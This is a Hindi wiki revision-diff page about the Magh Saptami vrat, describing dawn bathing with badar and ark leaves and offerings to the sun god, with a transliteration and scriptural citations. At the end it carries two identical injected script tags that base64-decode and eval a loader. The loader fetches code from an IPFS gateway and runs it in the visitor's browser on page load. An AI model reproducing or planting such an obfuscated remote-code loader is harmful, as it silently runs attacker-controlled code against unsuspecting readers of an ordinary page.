Difference between revisions of "माघ सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*इस व्रत को [[माघ]] [[शुक्ल पक्ष|शुक्ल]] सप्तमी पर किया जाता है।  
 
*इस व्रत को [[माघ]] [[शुक्ल पक्ष|शुक्ल]] सप्तमी पर किया जाता है।  
*अरुणोदय के समय किसी नदी या बहते हुए जल में अपने सर पर बदर वृक्ष एवं अर्क पौधे की सात-सात पत्तियाँ रख कर स्नान करना चाहिए।  
+
*अरुणोदय के समय किसी नदी या बहते हुए जल में अपने सर पर बदर वृक्ष एवं [[अर्क]] पौधे की सात-सात पत्तियाँ रख कर स्नान करना चाहिए।  
 
*सात बदर फलों, सात अर्क दलों, चावल, तिल, दूर्वा, अक्षतों एवं चन्दन के साथ मिश्रित जल से [[सूर्य देवता|सूर्य]] को अर्ध्य देना चाहिये।  
 
*सात बदर फलों, सात अर्क दलों, चावल, तिल, दूर्वा, अक्षतों एवं चन्दन के साथ मिश्रित जल से [[सूर्य देवता|सूर्य]] को अर्ध्य देना चाहिये।  
 
*सप्तमी को देवी समझ कर सूर्य को प्रणाम करना चाहिए।  
 
*सप्तमी को देवी समझ कर सूर्य को प्रणाम करना चाहिए।  

Revision as of 12:59, 8 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • is vrat ko magh shukl saptami par kiya jata hai.
  • arunoday ke samay kisi nadi ya bahate hue jal mean apane sar par badar vriksh evan ark paudhe ki sat-sat pattiyaan rakh kar snan karana chahie.
  • sat badar phaloan, sat ark daloan, chaval, til, doorva, akshatoan evan chandan ke sath mishrit jal se soory ko ardhy dena chahiye.
  • saptami ko devi samajh kar soory ko pranam karana chahie.
  • kuchh logoan ke mat se yah snan tatha 'magh snan' alag-alag nahian hai, kintu kuchh log donoan ko do manate haian.[1]; [2]; [3]; [4]


tika tippani aur sandarbh

  1. krityaratnakar (509)
  2. varshakriyakaumudi (499-502)
  3. krityatattv (459)
  4. rajamartand (e0 bi0 ar0 aee0, jild 36, pri0 332)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>